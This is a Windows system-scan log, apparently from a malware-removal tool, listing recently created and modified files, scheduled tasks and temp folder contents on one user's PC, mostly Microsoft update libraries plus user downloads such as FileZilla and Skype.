2014-10-14 22:16 - 2014-09-25 15:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 22:16 - 2014-09-25 15:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 22:16 - 2014-09-25 15:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 22:16 - 2014-09-25 15:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 22:16 - 2014-09-25 15:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 22:16 - 2014-09-25 15:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 22:16 - 2014-09-18 19:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 22:16 - 2014-09-18 18:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 22:16 - 2014-09-18 18:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 22:16 - 2014-09-18 18:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 22:16 - 2014-09-18 18:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 22:16 - 2014-09-18 18:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 22:16 - 2014-09-18 18:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 22:16 - 2014-09-18 18:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 22:16 - 2014-09-18 18:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 22:16 - 2014-09-18 18:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 22:16 - 2014-09-18 18:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 22:16 - 2014-09-18 18:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 22:16 - 2014-09-18 18:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 22:16 - 2014-09-18 18:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 22:16 - 2014-09-18 18:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 22:16 - 2014-09-18 18:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 22:16 - 2014-09-18 18:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 22:16 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 22:16 - 2014-09-18 18:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 22:16 - 2014-09-18 18:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 22:16 - 2014-09-18 18:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 22:16 - 2014-09-18 18:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 22:16 - 2014-09-18 18:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 22:16 - 2014-09-18 18:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 22:16 - 2014-09-18 18:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 22:16 - 2014-09-18 18:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 22:16 - 2014-09-18 17:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 22:16 - 2014-09-18 17:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 22:16 - 2014-09-18 17:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 22:16 - 2014-09-18 17:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 22:16 - 2014-09-18 17:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 22:16 - 2014-09-18 17:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 22:16 - 2014-09-18 17:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 22:16 - 2014-09-18 17:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 22:16 - 2014-09-18 17:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 22:16 - 2014-09-18 17:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 22:16 - 2014-09-18 17:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 22:16 - 2014-09-18 17:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 22:16 - 2014-09-18 17:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 22:16 - 2014-09-18 17:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 22:16 - 2014-09-18 17:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 22:16 - 2014-09-18 17:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 22:16 - 2014-09-18 17:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 22:16 - 2014-09-18 16:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 22:16 - 2014-09-18 16:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 22:16 - 2014-09-18 16:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 22:16 - 2014-09-18 16:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-10-14 22:16 - 2014-07-08 15:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-14 22:16 - 2014-07-08 15:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-10-14 22:16 - 2014-07-06 19:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 22:16 - 2014-07-06 19:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 22:16 - 2014-07-06 19:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 22:16 - 2014-07-06 18:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 22:16 - 2014-07-06 18:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 22:15 - 2014-10-09 19:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 22:15 - 2014-10-09 19:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 22:15 - 2014-10-09 19:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 22:15 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 22:15 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 22:15 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 22:15 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 22:15 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 22:15 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 22:15 - 2014-08-18 20:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 22:15 - 2014-08-18 20:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 22:15 - 2014-08-18 20:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 22:15 - 2014-08-18 20:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 22:15 - 2014-08-18 20:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-14 22:15 - 2014-08-18 20:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-14 22:15 - 2014-08-18 20:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-14 22:15 - 2014-08-18 20:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 22:15 - 2014-08-18 20:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 22:15 - 2014-08-18 20:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-14 22:15 - 2014-08-18 19:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 22:15 - 2014-08-18 19:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-14 22:15 - 2014-08-18 19:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 22:15 - 2014-07-16 19:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 22:15 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 22:15 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 22:15 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 22:15 - 2014-07-16 18:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 22:15 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 22:15 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-14 22:15 - 2014-07-06 19:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 22:15 - 2014-07-06 19:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 22:15 - 2014-07-06 19:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 22:15 - 2014-07-06 19:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 22:15 - 2014-07-06 19:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 22:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 22:15 - 2014-07-06 19:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 22:15 - 2014-07-06 19:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 22:15 - 2014-07-06 19:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 22:15 - 2014-07-06 18:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 22:15 - 2014-07-06 18:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 22:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 22:15 - 2014-07-06 18:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 22:15 - 2014-07-06 18:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 22:15 - 2014-07-06 18:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 22:15 - 2014-07-06 18:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 22:15 - 2014-07-06 18:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 22:15 - 2014-07-06 18:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 22:15 - 2014-06-27 17:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 22:15 - 2014-06-27 17:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 22:15 - 2014-06-27 17:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-04 19:03 - 2014-10-04 19:04 - 00000000 ____D () C:\Users\Rod\Downloads\produkey-x64
2014-10-04 19:02 - 2014-10-04 19:02 - 00071779 _____ () C:\Users\Rod\Downloads\produkey-x64.zip
2014-10-02 12:15 - 2014-10-02 12:15 - 00000000 ____D () C:\Users\Rod\AppData\Local\Citrix
2014-10-02 07:02 - 2014-10-02 07:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Apps Sync
2014-09-30 17:08 - 2014-09-30 17:08 - 00003338 _____ () C:\Windows\System32\Tasks\Backup Data
2014-09-30 13:50 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-09-30 13:50 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-30 09:00 - 2014-09-30 09:00 - 00003441 _____ () C:\Users\Rod\Downloads\Active Services Report.csv
2014-09-25 14:02 - 2014-09-25 14:02 - 06057862 _____ (Tim Kosse) C:\Users\Rod\Downloads\FileZilla_3.9.0.5_win32-setup.exe
2014-09-23 17:40 - 2014-09-09 15:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-23 17:40 - 2014-09-09 14:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-19 17:20 - 2014-09-19 17:20 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-09-19 17:20 - 2014-09-19 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-17 15:12 - 2014-01-21 23:29 - 01298047 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 15:11 - 2014-02-06 15:06 - 00000000 ____D () C:\Users\Rod\Documents\Outlook Files
2014-10-17 15:11 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\tracing
2014-10-17 15:00 - 2014-02-08 15:30 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-17 15:00 - 2014-02-08 15:30 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-17 12:09 - 2014-02-08 22:49 - 00000000 ____D () C:\ProgramData\Sonos,_Inc
2014-10-17 11:59 - 2009-07-13 21:45 - 00031952 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-17 11:59 - 2009-07-13 21:45 - 00031952 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-17 11:55 - 2014-02-08 15:43 - 00000000 ___RD () C:\Users\Rod\Documents\Google Drive
2014-10-17 11:54 - 2014-09-01 10:15 - 00002896 _____ () C:\Windows\System32\Tasks\AutoKMS
2014-10-17 11:54 - 2014-03-31 21:24 - 00000000 ____D () C:\ProgramData\boost_interprocess
2014-10-17 11:54 - 2014-03-09 10:28 - 00000266 _____ () C:\Windows\Tasks\AutoKMS.job
2014-10-17 11:54 - 2014-02-08 13:01 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\uTorrent
2014-10-17 11:53 - 2014-06-09 14:49 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-10-17 11:53 - 2014-01-21 23:56 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-10-17 11:53 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-17 11:53 - 2009-07-13 21:51 - 00035416 _____ () C:\Windows\setupact.log
2014-10-17 11:05 - 2010-11-20 20:47 - 00897972 _____ () C:\Windows\PFRO.log
2014-10-17 10:34 - 2014-02-10 10:46 - 00002068 ____H () C:\Users\Rod\Documents\Default.rdp
2014-10-16 12:04 - 2014-02-11 11:14 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-16 07:57 - 2010-08-02 08:22 - 00000000 ____D () C:\Users\Rod\Documents\Work
2014-10-15 17:31 - 2014-05-13 12:38 - 00001953 _____ () C:\Users\Public\Desktop\Sonos.lnk
2014-10-15 17:31 - 2014-02-08 22:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sonos
2014-10-15 17:31 - 2014-02-08 22:50 - 00000000 ____D () C:\Program Files (x86)\Sonos
2014-10-15 17:30 - 2014-02-08 22:47 - 00000000 ____D () C:\Users\Rod\AppData\Local\Downloaded Installations
2014-10-15 15:22 - 2014-02-06 12:06 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 11:06 - 2014-02-10 18:04 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\VMware
2014-10-15 10:51 - 2014-02-10 16:44 - 00002440 _____ () C:\Users\Public\Desktop\VMware vSphere Client.lnk
2014-10-15 10:51 - 2014-02-10 16:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VMware
2014-10-15 03:46 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 03:10 - 2009-07-13 21:45 - 00429288 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 03:07 - 2014-05-07 03:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 03:07 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 03:07 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 03:04 - 2014-02-06 13:48 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 00:30 - 2014-02-08 17:41 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\vlc
2014-10-14 23:54 - 2014-02-08 13:13 - 00000000 ____D () C:\Users\Rod\Downloads\Torrents
2014-10-14 20:28 - 2014-07-03 10:23 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\FileZilla
2014-10-12 11:32 - 2014-02-06 13:49 - 00000000 ____D () C:\Users\Rod\AppData\Local\Microsoft Help
2014-10-03 10:02 - 2014-02-06 12:06 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 07:01 - 2014-05-06 19:50 - 00000000 ____D () C:\Users\Default\AppData\Local\Google
2014-10-02 07:01 - 2014-05-06 19:50 - 00000000 ____D () C:\Users\Default User\AppData\Local\Google
2014-10-01 10:23 - 2014-02-06 13:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-09-28 22:49 - 2014-02-21 16:09 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\Skype
2014-09-25 14:02 - 2014-08-21 16:57 - 06052529 _____ (Tim Kosse) C:\Users\Rod\Downloads\FileZilla_3.9.0.3_win32-setup.exe
2014-09-19 17:20 - 2014-02-21 16:08 - 00002515 _____ () C:\Users\Public\Desktop\Skype.lnk
2014-09-19 17:20 - 2014-02-21 16:08 - 00000000 ____D () C:\ProgramData\Skype

Some content of TEMP:
====================
C:\Users\Rod\AppData\Local\Temp\917b0b87-3358-4e79-93de-3dfc2fc99ed0.exe
C:\Users\Rod\AppData\Local\Temp\Execute2App.exe
C:\Users\Rod\AppData\Local\Temp\ICReinstall_FileZilla_3.8.1_win32-setup.exe
C:\Users\Rod\AppData\Local\Temp\ICReinstall_FirefoxSetup.exe
C:\Users\Rod\AppData\Local\Temp\msvcp90.dll
